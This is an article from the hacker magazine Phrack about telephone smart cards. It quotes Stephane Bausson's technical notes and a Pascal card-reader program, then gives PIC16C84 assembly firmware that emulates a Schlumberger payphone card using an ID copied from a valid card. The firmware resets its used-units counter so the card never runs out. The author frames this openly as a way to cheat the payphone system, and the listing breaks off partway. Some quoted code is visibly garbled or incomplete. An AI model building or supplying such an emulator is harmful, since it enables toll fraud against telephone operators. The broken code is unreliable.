                 Volume Seven, Issue Forty-Eight, File 10 of 18

              Electronic Telephone Cards: How to make your own!

I guess that Sweden is not the only country that employs the electronic
phone card systems from Schlumberger Technologies. This article will
explain a bit about the cards they use, and how they work. In the end of
this article you will also find an UUEncoded file which contains source
code for a PIC16C84 micro-controller program that completely emulates a
Schlumberger Telephone card and of course printed circuit board layouts
+ a component list... But before we begin talking seriously of this
matter I must first make it completely clear that whatever you use this
information for, is entirely YOUR responsibility, and I cannot be held
liable for any problems that the use of this information can cause for
you or for anybody else. In other words: I give this away FOR FREE, and
I don't expect to get ANYTHING back in return!

The Original Telephone Card:
Since I probably would have had a hard time writing a better article
than the one Stephane Bausson from France wrote a while ago, I will not
attempt to give a better explanation than that one; I will instead
incorporate it in this phile, but I do want to make it clear that the
following part about the cards technical specification was not written
by me: Merely the parts in quotes are things added by me... Instead I
will concentrate on explaining how to build your own telephone card
emulator and how the security measures in the payphone system created by
Schlumberger Technologies work, and how to trick it... But first, let's
have a look at the technical specifications of the various "smart memory
card" systems used for the payphones.

<Start of text quoted from Stephane Bausson (>

	      What you need to know about electronics telecards

(C) 10-07-1993 / 03-1994
Version 1.06
Stephane BAUSSON

Smail: 4, Rue de Grand; F-88630 CHERMISEY; France
Phone: (33)-29-06-09-89
    Any suggestions or comments about phonecards and smart-cards are welcome


I ) The cards from Gemplus, Solaic, Schlumberger, Oberthur:

    I-1) Introduction:
    I-2) SCHEMATICS of the chip:
    I-3) PINOUT of the connector:
    I-4) Main features:
    I-6) Memory MAP of cards from France and Monaco:
    I-5) Memory MAP of cards from other countries:

II ) The cards from ODS: (German cards)

    II-1) Introduction:
    II-2) Pinout:
    II-3) Main features:
    II-4) Time Diagrams:
    II-5) Memory Map:
    II-6) Electrical features:

III) The Reader Schematic:

IV) The program:


I ) The cards from Gemplus, Solaic, Schlumberger, Oberthur: (French cards)

    I-1) Introduction:

       You must not think that the electronics phone-cards are
completely secret things, and that you can not read the information that
is inside. It is quite false, since in fact an electronic phonecard does
not contain any secret information like credit cards, and an electronic
phonecard is nothing else than a 256 bit EPROM with serial output.

       Besides do not think that you are going to refill them when you
understand how they work, since for that you should reset the 256 bits
of the cards by erasing the whole card. But the chip is coated in UV
opaqued resin even if sometimes you can see it as transparent! Even if
you were smart enough to erase the 256 bits of the card you should
program the manufacturer area, but this is quite impossible since these
first 96 bits are write protected by a lock-out fuse that is fused after
the card programming in factory.

       Nevertheless it can be very interesting to study how these cards
work, to see which kind of data are inside and how the data are mapped
inside or to see how many units are left inside for example. Besides
there are a great number of applications of these cards when there are
used (only for personal usage of course) , since you can use them as key
to open a door, or you can also use them as key to secure a program,

       These Telecards have been created in 1984 and at this time
constructors decided to build these cards in NMOS technology but now,
they plan to change by 1994 all readers in the public to booths and use
CMOS technology. Also they plan to use EEPROM to secure the cards and to
add many useful informations in, and you will perhaps use phone cards to
buy you bread or any thing else.

These cards are called Second Generation Telecards.

    I-2) SCHEMATICS of the chip:

		    |                   |
		  --|> Clk              |
		    | _                 |
		  --| R/W               |
		    |                   |
		  --| Reset             |
		    |                   |
		  --| Fuse              |
		    |                   |
		  --| Vpp               |
		    |                   |
		    |                   |
		    '-.               .-'
		      |               |
		    |               Out |-- serial output

    I-3) PINOUT of the connector:

	  AFNOR CHIP                                   ISO CHIP
	  ----------                                   --------

 -------------+-------------                 -------------+-------------
|   8         |         4   |               |   1         |         5   |
|             |             |               |             |             |
+-------\     |     /-------+               +-------\     |     /-------+
|   7    +----+----+    3   |               |   2    +----+    +    6   |
|        |         |        |               |        |         |        |
+--------|         |--------+               +--------|         |--------+
|   6    |         |    2   |               |   3    |         |    7   |
|        +    +----+        |               |        +----+----+        |
+-------/     |     \-------+               +-------/     |     \-------+
|   5         |         1   |               |   4         |         8   |
|             |             |               |             |             |
 -------------+-------------                 -------------+-------------

				     NB: only the position of the chip is ISO
					 standardized and not the pinout

PINOUT:    1 : Vcc = 5V        5 : Gnd
------     2 : R/W             6 : Vpp = 21V
	   3 : Clock           7 : I/O
	   4 : Reset           8 : Fuse

    I-4) Main features:

	- Synchronous protocol.
	- N-MOS technology.
	- 256x1 bit organization.
	- 96 written protected by a lock-out fuse.
	- Low power 85mW in read mode.
	- 21 V programming voltage.
	- Access time: 500ns
	- Operating range: -100C +700C
	- Ten year data retention.


+21V                                     _____________
+5V ____________________________________|             |_________________ Vpp
					:             :
+5V                  ___________________:_____________:_________________ Reset
0V  ________________|                   :             :
		    :                   :             :
+5V     ____        :      ____         :       ______:______
0V  ___|    |_______:_____|    |________:______|      :      |__________ Clock
       :    :       :     :    :        :      :      :      :
+5V    :    :       :     :    :        :______:______:      :           _
0V  ___:____:_______:_____:____:________|      :      |______:__________ R/W
       :    :       :     :    :        :      :      :      :
+5V    :    :       :_____:    :________:      :      :      :__________
       :    :       :     :    :        :<-----><---->:      :
       :    :       :     :    :        :10 to   10 to       :
       :    :       :     :    :        :50 ms   50ms        :
	Reset        Bit 1        Bit2                           Bit 3
	card        reading      reading  Bit2 writing to 1     reading

    I-6) MEMORY MAP of cards from France and Monaco:

Bytes       Bits      Binary     Hexa

  1        1 --> 8  |           |     | ---> Builder code.
  2       9 --> 16  | 0000 0011 | $03 | ---> a French telecard
  3      17 --> 24  |           |     |
  4      25 --> 32  |           |     |
  5      33 --> 40  |           |     |
  6      41 --> 48  |           |     |
  7      49 --> 56  |           |     |
  8      57 --> 64  |           |     |
  9      65 --> 72  |           |     |
 10      73 --> 80  |           |     |
 11      81 --> 88  |           |     |
 12      33 --> 40  | 0001 0011 | $13 | ---> 120 units card
		    | 0000 0110 | $06 | --->  50 units card
		    | 0000 0101 | $05 | --->  40 units card
 13-31  97 --> 248  |           |     | ---> The units area: each time a unit
		    |           |     |      is used, then a bit is set to "1";
                    |           |     |      Generally the first ten units are
		    |           |     |      fused in factory as test.
		    |           |     |
		    |           |     |
		    |           |     |
 32    249 --> 256  | 1111 1111 | $FF | ---> the card is empty

    I-7) MEMORY MAP of the other cards:

Bytes       Bits      Binary     Hexa

  1        1 --> 8  |           |     |
  2       9 --> 16  | 1000 0011 | $83 | ---> a telecard
3-4      17 --> 32  | 1000 0000 | $80 | 0001 0010 | $12 | ---> 10 units card
		    |           |     | 0010 0100 | $24 | ---> 22 units card
		    |           |     | 0010 0111 | $27 | ---> 25 units card
		    |           |     | 0011 0010 | $32 | ---> 30 units card
		    |           |     | 0101 0010 | $52 | ---> 50 units card
		    |           |     | 1000 0010 | $82 | ---> 80 units card
		    | 1000 0001 | $81 | 0000 0010 | $02 | ---> 100 units card
		    |           |     | 0101 0010 | $52 | ---> 150 units card
  5      33 --> 40  |           |     |
  6      41 --> 48  |           |     |
  7      49 --> 56  |           |     |
  8      57 --> 64  |           |     |
  9      65 --> 72  |           |     |
 10      73 --> 80  |           |     |
 11      81 --> 88  |           |     |
 12      89 --> 96  | 0001 1110 | $1E | ---> Sweden
		    | 0010 0010 | $22 | ---> Spain
		    | 0011 0000 | $30 | ---> Norway
		    | 0011 0011 | $33 | ---> Andorra
		    | 0011 1100 | $3C | ---> Ireland
		    | 0100 0111 | $47 | ---> Portugal
		    | 0101 0101 | $55 | ---> Czech Republic
		    | 0101 1111 | $5F | ---> Gabon
		    | 0110 0101 | $65 | ---> Finland
 13-31  97 --> 248  |           |     | ---> The units area: each time a unit
		    |           |     |      is used, then a bit is set to "1";
		    |           |     |
		    |           |     |      Generally the first two units are
		    |           |     |      fused in factory as test.
		    |           |     |
		    |           |     |
 32    249 --> 256  | 0000 0000 | $00 |

II ) The cards from ODS, Giesecke & Devrient, ORGA Karten systeme,
     Uniqua, Gemplus, Schlumberger and Oldenbourg Kartensysteme:

    II-1) Introduction:

        These cards are in fact 128 bit memory in NMOS technology, and
the map of these cards are the following:

	       64 bit EPROM written protected (manufacturer area).
	       40 bit EEPROM (5x8 bits).
	       24 bits set to "1".

    II-2) Pinout:

	   ISO 7816-2

 |   1         |         5   |        Pinout:
 |             |             |        -------
 +-------\     |     /-------+
 |   2    +----+    +    6   |          1 : Vcc = 5V    5 : Gnd
 |        |         |        |          2 : Reset       6 : n.c.
 +--------|         |--------+          3 : Clock       7 : I/O
 |   3    |         |    7   |          4 : n.c.        8 : n.c.
 |        +----+----+        |
 +-------/     |     \-------+      n.c. : not connected
 |   4         |         8   |
 |             |             |

    II-3) Main features:

	- ISO 7816- 1/2 compatible.
	- use a single 5V power supply.
	- low power consumption.
	- NMOS technology.

    II-4) Time Diagrams:

  The address counter is reset to 0 when the clock line CLK is raised
while the control line R is high. Note that the address counter can not
be reset when it is in the range 0 to 7.

_____|                  |_____________________________________________ Reset
     :                  :
     :        _____     :  _____       _____       _____       _____
_____:_______|     |____:_|     |_____|     |_____|     |_____|     |_ Clk
     :       :          : :     :     :     :     :     :     :     :
_____:___n___|_____0____:_|_____1_____|_____2_____|_____3_____|___4_:_ (Address)
     :                  :       :           :           :           :
_____:                  :_______:___________:___________:___________:_
_____XXXXXXXXXXXXXXXXXXXX_______|___________|___________|___________|_ Data
Bit n                      Bit 0    Bit 1        Bit2       Bit3

   The address counter is incremented by 1 with each rising edge of the
clock signal Clk, for as long as the control line R remains low. The
data held in each addressed bit is output to I/O contact each time Clk
falls. It is not impossible to decrement the address counter, therefore
to address an earlier bit, the address counter must be reset then
incremented to require value.

   All unwritten or erased bits in the address 64-104 may be unwritten
to. When a memory cell is unwritten to, it is set to 0. The addressed
cell is unwritten to by the following sequence.

1- R is raised while Clk is low, to disable address counter increment
for one clock pulse.

2- Clk is then raised for a minimum of 10ms to write to the address bit.

When to write operation ends, and Clk falls, the address counter is
unlocked, and the content of the written cell, which is now 0, is output
to I/O contact if the operation is correct.

The next Clk pulse will increment the address by one, then the write
sequence can be repeated to write the next bit.

	      _____                                _____
____________|     |______________________________|     |_______________ Reset
            :                                    :
    ___     :           _____           ___      :           _____
___|   |____:__________|     |_________|   |_____:__________|     |____ Clk
   :        :          :     :         :   :     :          :     :
n  |      n+1          |     n+2       |   :    n+3         |     :      (Addr)
            :          :     :             :     :          :     :
________   _:          :     : ____________:  ___:          :     :
  n      n+1           :     :     n+1        n+2           :     :
                       :     :                              :     :
                        write                                write


   A counter is erased by performing the WRITECARRY sequence on the
stage of the next highest weighing to that to be erased.

The writecarry sequence is as follows:

1 - Set the address counter to an unwritten bit in the next highest
counter stage to that to be erased.

2 - Increment is disabled on the following rising edge of R where Clk
remains low.

3 - Clk is then raised for a minimum of 10ms, while R is low, to write
to the next address bit.

4 - R is the raised again while Clk remains low to disable increment a
second time.

5 - Clk is the raised for a minimum of 1ms, while R is low, to write to
the addressed bit a second time, erasing the counter level immediately
below that the addressed bit.

       _____                      _____
______|     |____________________|     |_________________________________  Rst
      :                          :
      :            _______       :              _______        ___
______:___________|       |______:_____________|       |______|   |______  Clk
      :           :       :      :             :       :      :   :
      :           :       :      :             :       :      :   :
<------------------------- address n ------------------------>:<--- n+1 ------
      :           :       :      :             :       :          :
      :           :       :      :             :       :          :
______:           :       :______:             :       :__________: _____
		  :       :  n                 :       :     n        n+1
		  :       :                    :       :
		    Write                        Erase

     II-5) Memory Map:

Bytes       Bits      Binary     Hexa

  1       1 -->   8 |           |     |
  2       9 -->  16 | 0010 1111 | $2F | ---> Germany
		    | 0011 0111 | $37 | ---> Netherland
		    | 0011 1011 | $3B | ---> Greece
  3      17 -->  24 |           |     |
  4      25 -->  32 |           |     | ---> Issuer area (written protected)
  5      33 -->  40 |           |     |
  6      41 -->  48 |           |     |
  7      49 -->  56 |           |     |
  8      57 -->  64 |           |     |
  9      65 -->  72 |           |     | ---> c4096  )
 10      73 -->  80 |           |     | --->  c512  )
 11      81 -->  88 |           |     | --->   c64  ) 5 stage octal counter
 12      89 -->  96 |           |     | --->    c8  )
 13      97 --> 104 |           |     | --->    c0  )
 14     105 --> 112 | 1111 1111 | $FF |
 15     113 --> 120 | 1111 1111 | $FF | ---> area of bits set to "1"
 16     120 --> 128 | 1111 1111 | $FF |

The Issuer area:

    This issuer consists of 40 bits. The contents of the issuer area are
specified by the card issuer, and are fixed during the manufacturing
process. The contents of the issuer area will include data such as
serial numbers, dates, and distribution centers.

This area may only be read.

The Counter area:

   The counter area stores the card's units. Its initial value is
specified by the card issuer and set during manufacturing.

The counter area is divided into a 5 stage abacus.

Note that you can only decrease the counter and it is not authorized to
write in the counter a value greater than the old value.

    I-6) Electrical features:

Maximum ratings:

		       | Symbol | Min  |  Max | Unit |
| Supply voltage       |   Vcc  | -0.3 |    6 |   V  |
| Input voltage        |   Vss  | -0.3 |    6 |   V  |
| Storage temperature  |  Tstg  |  -20 |  +55 |  0C  |
| Power dissipation   |    Pd  |   -  |   50 |  mW  |

DC characteristics:
			    | Symbol | Min.| Typ.| Max.| Unit |
| Supply current            |   Icc  |  -  |  -  |   5 |   mA |
| Input Voltage (low)       |    Vl  |   0 |  -  | 0.8 |    V |
| Input voltage (high)      |    Vh  | 3.5 |  -  | Vcc |    V |
| Input current R           |    Ih  |  -  |  -  | 100 |   uA |
| Input current Clk         |    Il  |  -  |  -  | 100 |   uA |
| Output current (Vol=0.5V) |   Iol  |  -  |  -  |  10 |   uA |
| Output current (Voh=5V)   |   Ioh  |  -  |  -  | 0.5 |   mA |

AC characteristics:
------------------     +--------+------+------+------+
		       | Symbol | Min. | Max. | Unit |
| Pulse duration       |    tr  |   50 |   -  |  us  |
| R address reset      |        |      |      |      |
| Pulse duration       |    ts  |   10 |   -  |  us  |
| R write              |        |      |      |      |
| High level Clk       |    th  |    8 |   -  |  us  |
| Low level Clk        |    tl  |   12 |   -  |  us  |
| Write window         | Twrite |   10 |   -  |  ms  |
| Erase window         | Terase |   10 |   -  |  ms  |
|                      |   tv1  |    5 |   -  |  us  |
|                      |   tv2  |  3.5 |   -  |  us  |
|                      |   tv3  |  3.5 |   -  |  us  |
|                      |   tv4  |  3.5 |   -  |  us  |
|                      |   tv5  |  3.5 |   -  |  us  |
|                      |   tv6  |    5 |   -  |  us  |
|                      |   tv7  |    5 |   -  |  us  |
|                      |   tv8  |   10 |   -  |  us  |

III) The Reader Schematic:

   External 5V (Optional)

5V o------,
	  |                 /             T2  PNP      d13  r7 10
0V o--,   |                /               BC 177     |\ |  _____
      |   |      ,-------o/   o--*------. E      C .--| >+-[_____]--------,
    __+__ |      |               |       \        /   |/ |                |
    \\\\\ |    __|__ Battery     |         \    /                         |
	  |      -   22.5V       |       ---------                        |
.......   |      |               |   _____   |   _____                    |
       :  |    __+__             +--[_____]--*--[_____]--,                |
   D2  :  |    \\\\\                r6 150k     r5 15k   |                |
4 o-------|---------------------------*------------------|-------------,  |
       :  |                           |   r3 220k       / C            |  |
   Ack :  |                           |   _____      |/    T1 - NPN    |  |
10 o------|--------.                  '--[_____]-*---|      BC107      |  |
       :  |        |                      _____  |   |\                |  |
       : ,-,      ,-,                 +--[_____]-'      \ E            |  |
       : | |r2    | |r1               |  r4 390k         |             |  |
       : | |220   | |22k            __+__              __+__           |  |
       : |_|      |_|               \\\\\              \\\\\           |  |
       :  |  |\ |  |                                                   |  |
       :  *--| >+--|----------------*----------------------------------|--*
       :  |  |/ |  |          ,-----|-----------------------------,    |  |
       :  |  d1    |          |     |   ,----------,----------,   |    |  |
       :  |        |          |     *---|--*  Fuse | Reset *--|---'    |  |
       :  |        |          |     |   |----------|----------|        |  |
   D0  :  |        |          |   ,-|---|--*   I/O | Clk   *--|---,    |  |
2 o-------|--------|----------'   | |   |----------|----------|   |    |  |
       :  |        |              | '---|--*   Vpp | R/W   *--|---|----'  |
  Busy :  |        |              |     |----------|----------|   |       |
11 o------|--------|--------------' ,---|--*   Gnd | 5V    *  |   |       |
       :  |        |                |   '----------'-------|--'   |       |
   D1  :  |        |              __+__    Chip connector  |      |       |
3 o-------|--------|--------,     \\\\\                    |      |       |
       :  |        |        '------------------------------|------'       |
  Str  :  |  |\ |  |                                       |              |
1 o-------*--| >+--*----*----*----*----*-------------------'              |
       :   d2|/ |  |d3  |d4  |d5  |d6  |d7                                |
       :          -+-  -+-  -+-  -+-  -+-                                 |
       :          /_\  /_\  /_\  /_\  /_\                                 |
   D3  :           |    |    |    |    |   |\ | d8                        |
5 o----------------*----|----|----|----|---| >+-------*-------------------'
       :                |    |    |    |   |/ |       |
       :                |    |    |    |              |
   D4  :                |    |    |    |   |\ | d9    |
6 o---------------------*----|----|----|---| >+-------*
       :                     |    |    |   |/ |       |
       :                     |    |    |              |
   D5  :                     |    |    |   |\ | d10   |
7 o--------------------------*----|----|---| >+-------*
       :                          |    |   |/ |       |
       :                          |    |              |
   D6  :                          |    |   |\ | d11   |
8 o-------------------------------*----|---| >+-------*
       :                               |   |/ |       |
       :                               |              |
   D7  :                               |   |\ | d12   |
9 o------------------------------------*---| >+-------'
       :                                   |/ |
25 o------.
       :  |
.......:  |                                 d1 to d13: 1N4148

Centronics port

IV) The program:

    The following program will enable you to read telecards on you PC if you
build the reader.

--------------- cut here (begin)
{                             T E L E C A R D . PAS                           }
{   This program enable you to dumb the memory of electronics phonecards      }
{   from all over the world, so that you will be able to see which country    }
{   the card is from how many units are left and so on ....                   }
{                                                                             }
{                        Written by Stephane BAUSSON (1993)                   }
{                                                                             }
{                         Email:                    }
{                                                                             }
{                       Snail Mail Address: 4, Rue de Grand                   }
{                                           F-88630 CHERMISEY                 }
{                                           France                            }
{                                                                             }
{* Thanks to: Tomi Engdahl (                             *}

USES crt,dos;

CONST port_address=$378;     { lpr1 chosen }

TYPE string8=string[8];

VAR reg         : registers;
    i,j         : integer;
    Data        : array[1..32] of byte;
    car         : char;
    byte_number : integer;
    displaying  : char;


PROCEDURE Send(b:byte);

  BEGIN port[port_address]:=b;


FUNCTION Get:byte;

  BEGIN get:=port[port_address+1];

{ FUNCTION dec2hexa_one(decimal_value):hexa_character_representation;         }
{                                                                             }
{       - convert a 4 bit long decimal number to hexadecimal.                 }

FUNCTION dec2hexa_one(value:byte):char;

  BEGIN case value of
	  0..9   : dec2hexa_one:=chr(value+$30);
	  10..15 : dec2hexa_one:=chr(value+$37);

{ FUNCTION d2h(decimal_byte):string2;                                         }
{                                                                             }
{       - convert a decimal byte to its hexadecimal representation.           }

FUNCTION d2h(value:byte):string2;

  VAR msbb,lsbb:byte;

  BEGIN msbb:=0;
	if ( value >= $80 ) then
	BEGIN msbb:=msbb+8;
	if ( value >= $40 ) then
	BEGIN msbb:=msbb+4;
	if ( value >= $20 ) then
	BEGIN msbb:=msbb+2;
	if ( value >= $10 ) then
	BEGIN msbb:=msbb+1;

	if ( value >= $08 ) then
	BEGIN lsbb:=lsbb+8;
	if ( value >= $04 ) then
	BEGIN lsbb:=lsbb+4;
	if ( value >= $02 ) then
	BEGIN lsbb:=lsbb+2;
	if ( value >= $01 ) then
	BEGIN lsbb:=lsbb+1;
	d2h := dec2hexa_one(msbb) + dec2hexa_one(lsbb);


Function Binary( b : byte):string8;

  var weight : byte;
      s      : string8;

  BEGIN weight:=$80;
	while (weight > 0) do
	BEGIN if ((b and weight) = weight) then s:=s+'1'
	      else s:=s+'0';
	      weight:=weight div $02;


FUNCTION Units:byte;

  VAR  u, i : integer;
       s    : string8;

  BEGIN u:=0;
	while (Data[i] = $FF) do
	BEGIN u:=u+8;
	while(s[1]='1') do
	      BEGIN inc(u);


function Units_2:LongInt;

  BEGIN Units_2:=4096*Data[9]+512*Data[10]+64*Data[11]+8*Data[12]+Data[13];



  BEGIN case Data[2] of
	 $03: BEGIN write('Telecard - France - ');
		    case Data[12] of
		     $13: write('120 Units - ',units-130,' Units left');
		     $06: write('50 Units - ',units-60,' Units left');
		     $15: write('40 Units - ',units-40,' Units left');
	 $2F:BEGIN write('Telecard - Germany - ', Units_2, ' Units left');
	 $3B:BEGIN write('Telecard - Greece - ', Units_2, ' Units left');
	 $83:BEGIN write('Telecard');
		   case Data[12] of
		     $1E: write(' - Sweden');
		     $30: write(' - Norway');
		     $33: write(' - Andorra');
		     $3C: write(' - Ireland');
		     $47: write(' - Portugal');
		     $55: write(' - Czech Republic');
		     $5F: write(' - Gabon');
		     $65: write(' - Finland');
		   if (Data[12] in [$30,$33,$3C,$47,$55,$65]) then
		   BEGIN case ((Data[3] and $0F)*$100+Data[4]) of
			  $012: write (' - 10 Units - ',units-12,' Units left');
			  $024: write (' - 22 Units - ',units-24,' Units left');
			  $027: write (' - 25 Units - ',units-27,' Units left');
			  $032: write (' - 30 Units - ',units-32,' Units left');
			  $052: write (' - 50 Units - ',units-52,' Units left');
			  $067: write (' - 65 Units - ',units-62,' Units left');
			  $070: write (' - 70 Units - ',units-70,' Units left');
			  $102: write (' - 100 Units - ',units-102,' Units left');
			  $152: write (' - 150 Units -  ',units-152,' Units left');
{                    write(' - N0 ',Data[5]*$100+Data[6]);}


PROCEDURE waiting;

  BEGIN send($00);
	write('Enter a card in the reader and press a key ...');
	repeat until key pressed;
	gotoxy(1, wherey);


PROCEDURE Full_Displaying;

  BEGIN writeln('Memory dump:');
	for i:=1 to 80 do write('-');
	for i:=1 to (byte_number div 6 + 1) do
	BEGIN for j:=1 to 6 do
	      BEGIN if j+6*(i-1) <= byte_number then write(binary(Data[j+6*(i-1)]):9);
	      for j:=1 to 6 do
	      if j+6*(i-1) <= byte_number then write(d2h(Data[j+6*(i-1)]),' ');
	for i:=1 to 80 do write('-');


PROCEDURE Short_Displaying;

  VAR j : integer;

  BEGIN for j:=1 to byte_number do
	BEGIN write(d2h(Data[j]),' ');



  VAR i, j  : integer;
      Value : byte;

  BEGIN send($FE);
	for i:=1 to 32 do
	BEGIN Value:=0;
	      for j:=1 to 8 do
	      BEGIN Value:=Value*$02 + ((get and $08) div $08);
	case displaying of


PROCEDURE writing;

  VAR i,n:integer;

  BEGIN write('Which bit do you want to set to "1" : ');


	for i:=1 to n do
	BEGIN send($F9);
	      if i=n then
	      BEGIN send($FD);



  VAR filename : string;
      f        : text;
      i        : word;

  BEGIN write('Enter the filename: ');
	assign(f, filename);
	for i:=1 to byte_number do write(f,d2h(Data[i]),' ');


PROCEDURE initialize;

  VAR i : integer;

  BEGIN byte_number:=32;
	writeln(' 1 - to dump a 256 bits card');
	writeln(' 2 - to dump a 128 bits card');
	writeln(' F - to display in full format');
	writeln(' S  - to display in short format');
	writeln(' F2 - to save in a file');
	writeln(' Q  - to exit the program');
	for i:=1 to 80 do write('=');


BEGIN initialize;
      repeat waiting;
	     case car of
	      #00: BEGIN car:=readkey;
			 if car=#60 then saving;
	      else reading;
      until car='Q';
--------------- cut here (end)

	_/_/_/_/_/               Stephane BAUSSON
       _/_/_/_/_/    Engineering student at ENSEM (Nancy - France)
      _/_/_/_/_/   Smail: 4, Rue de Grand, F-88630 CHERMISEY, France
    _/_/_/_/_/            Email:

<End of text quoted from Stephane Bausson's text about the telephone cards>.


                              ==Phrack Magazine==

                 Volume Seven, Issue Forty-Eight, File 11 of 18

              Electronic Telephone Cards: How to make your own!

The Program:
Well, when I saw this phile about the cards the first time, about a year
ago I quickly realized that this system is very unsecure and really
needs to be hacked. So, now I present you with a piece of software for
the PIC 16C84 RISC micro-controller from Microchip that will take care
of emulating the cards used by Schlumberger and others. This system is
to be found in Scandinavia (Sweden, Norway and Finland), Spain, France
and other countries. I do know that France probably needs some small
modifications for this to work, but I see no reason to as why it
shouldn't do so! For this to work, you need to have access to a PROM
burner which can handle the PIC 16C84, or you might just build one
yourself as I include some plans for that in the UUEncoded block to be
found at the end of this phile. First of all, you have to read off the
first 12 bytes of data from a valid card from the country you wish your
emulator to work in. This because I don't think it would be a good idea
to publish stolen card identities in Phrack. Then you simply enter those
12 bytes of data in the proper place in my program and compile it.
That's it... And since I happen to choose a version of the PIC with
internal Data EEPROM, that means that the first 12 locations of the Data
EEPROM should contain the card id bytes. As of today this code should
work smooth and fine, but maybe you'll need to modify it later on when
Schlumberger gets tired of my hack. But since the PIC is a very fast and
powerful micro-controller it might be quite hard for them to come up
with a solution to this problem. Let's have a look at the PIC Software!
(Note that the current version of Microchip's PICSTART 16B package is
unable to program the DATA EEPROM array in the 16C84 so if you are going
to use that one, use the other version of the source code which you'll
find in the UUEncoded part!).

<Start of TELECARD.ASM>.

	TITLE   "ISO 7816 Synchronous Memory Card Emulator"
	LIST    P=PIC16C84, R=HEX

; PIC16C84 I/O Pin Assignment List

CRD_CLK         equ     0       ; RB0 + RA4 = Card Clock
CRD_DTA         equ     0       ; RA0 = Card Data Output
CRD_RST         equ     1       ; RB1 = Card Reset, Low-Active
CRD_WE          equ     7       ; RB7 = Card Write-Enable, Hi-Active

; PIC16C84 RAM Register Assignments

CRD_ID          equ     0x00c   ; Smartcard ID, 12 bytes
FUSCNT          equ     0x018   ; Fused units counter
BITCNT          equ     0x019   ; Bitcounter
LOOPCNT         equ     0x01a   ; Loop Counter
EE_FLAG         equ     0x01b   ; EEPROM Write Flag
TEMP1           equ     0x01c   ; Temporary Storage #1
TEMP2           equ     0x01d   ; Temporary Storage #2
TEMP3           equ     0x01e   ; Temporary Storage #3
TEMP4           equ     0x01f   ; Temporary Storage #4
TEMP_W          equ     0x02e   ; Temporary W Save Address
TEMP_S          equ     0x02f   ; Temporary STATUS Save Address

	org     0x2000          ; Chip ID Data
	dw      042,042,042,042

	org     0x2007          ; Configuration Fuses
	dw      B'00000001'

	org     0x2100          ; Internal Data EEPROM Memory (Card ID!!!)
	db      0x081,0x042,0x000,0x011,0x022,0x033
	db      0x044,0x055,0x066,0x077,0x011,0x084
	db      0x002           ; Default used up credits value

	org     PIC84           ; Reset-vector
	goto    INIT            ; Jump to initialization routine

	org     INTVEC          ; Interrupt-vector
	push                    ; Save registers
	call    INTMAIN         ; Call main interrupt routine
	pop                     ; Restore registers
	retfie                  ; return from interrupt & clear flag

	org     0x010           ; Start address for init rout.
INIT    bsf     STATUS,RP0      ; Access register bank 1
	clrwdt                  ; Clear watchdog timer
	movlw   B'11101000'     ; OPTION reg. settings
	movwf   OPTION          ; Store in OPTION register
	movlw   B'11111110'     ; Set PORT A Tristate Latches
	movwf   TRISA           ; Store in PORT A tristate register
	movlw   B'11111111'     ; Set PORT B Tristate Latches
	movwf   TRISB           ; Store in PORT B tristate register
	bcf     STATUS,RP0      ; Access register bank 0
	clrf    RTCC            ; Clear RTCC
	clrf    PORTA           ; Clear PORTA
	clrf    PORTB           ; Clear PORTB
	movlw   0d              ; 13 bytes to copy
	movwf   LOOPCNT         ; Store in LOOPCNT
	movlw   0c              ; Start storing at $0c in RAM
	movwf   FSR             ; Store in FSR
	clrf    EEADR           ; Start at EEPROM Address 0
	bsf     STATUS,RP0      ; Access register bank 1
	bsf     EECON1,RD       ; Set EECON1 Read Data Flag
	bcf     STATUS,RP0      ; Access register bank 0
	movfw   EEDATA          ; Read one byte of EEPROM Data
	movwf   INDIR           ; Store in RAM pointed at by FSR
	incf    FSR             ; Increase FSR pointer
	incf    EEADR           ; Increase EEPROM Address Pointer
	decfsz  LOOPCNT,1       ; Decrease LOOPCNT until it's 0
	goto    EECOPY          ; Go and get some more bytes!
	bsf     STATUS,RP0      ; Access register bank 1
	bcf     EECON1,EEIF     ; Clear EEPROM Write Int. Flag
	bcf     EECON1,WREN     ; EEPROM Write Disable
	bcf     STATUS,RP0      ; Access register bank 0
	movlw   B'10010000'     ; Enable INT Interrupt
	movwf   INTCON          ; Store in INTCON

MAIN    bsf     STATUS,RP0      ; Access register bank 1
	btfsc   EECON1,WR       ; Check if EEPROM Write Flag Set
	goto    MAIN            ; Skip if EEPROM Write is Completed
	bcf     EECON1,EEIF     ; Reset Write Completion Flag
	bcf     EECON1,WREN     ; EEPROM Write Disable
	bcf     STATUS,RP0      ; Access register bank 0
	btfss   EE_FLAG,LSB     ; Check for EEPROM Write Flag
	goto    MAIN            ; If not set, jump back and wait some more
	clrf    EE_FLAG         ; Clear EEPROM Write Flag
	movlw   0c              ; Units is stored in byte $0c
	movwf   EEADR           ; Store in EEPROM Address Counter
	movfw   FUSCNT          ; Get fused units counter
	movwf   EEDATA          ; Store in EEDATA
	bsf     STATUS,RP0      ; Access register bank 1
	bsf     EECON1,WREN     ; EEPROM Write Enable
	bcf     INTCON,GIE      ; Disable all interrupts
	movlw   055             ; Magic Number #1 for EEPROM Write
	movwf   EECON2          ; Store in EECON2
	movlw   0aa             ; Magic Number #2 for EEPROM Write
	movwf   EECON2          ; Store in EECON2
	bsf     EECON1,WR       ; Execute EEPROM Write
	bsf     INTCON,GIE      ; Enable all interrupts again!
	bcf     STATUS,RP0      ; Access register bank 0
	goto    MAIN            ; Program main loop!

INTMAIN btfsc   INTCON,INTF     ; Check for INT Interrupt
	goto    INTMAIN2        ; If set, jump to INTMAIN2
	movlw   B'00010000'     ; Enable INT Interrupt
	movwf   INTCON          ; Store in INTCON

	bcf     STATUS,RP0      ; Access register bank 0
	bsf     PORTA,CRD_DTA   ; Set Data Output High
	btfsc   PORTB,CRD_RST   ; Check if reset is low
	goto    NO_RST          ; If not, skip reset sequence
	movfw   RTCC            ; Get RTCC Value
	movwf   TEMP4           ; Store in TEMP4
	clrf    RTCC            ; Clear RTCC
	movlw   055             ; Subtract $55 from TEMP4
	subwf   TEMP4,0         ; to check for card reset....
	bnz     NO_RST2         ; If not zero, jump to NO_RST
	movlw   02              ; Unused one has $02 in FUSCNT
	movwf   FUSCNT          ; Store full value in FUSCNT
	bsf     EE_FLAG,LSB     ; Set EEPROM Write Flag
NO_RST2 bcf     INTCON,INTF     ; Clear INT Interrupt Flag
	return                  ; Mission Accomplished, return to sender

NO_RST  movfw   RTCC            ; Get RTCC Value
	movwf   BITCNT          ; Copy it to BITCNT
	movwf   TEMP1           ; Copy it to TEMP1
	movwf   TEMP2           ; Copy it to TEMP2
	movlw   060             ; Load W with $60
	subwf   TEMP1,0         ; Subtract $60 from TEMP1
	bz      CREDIT          ; If it is equal to $60
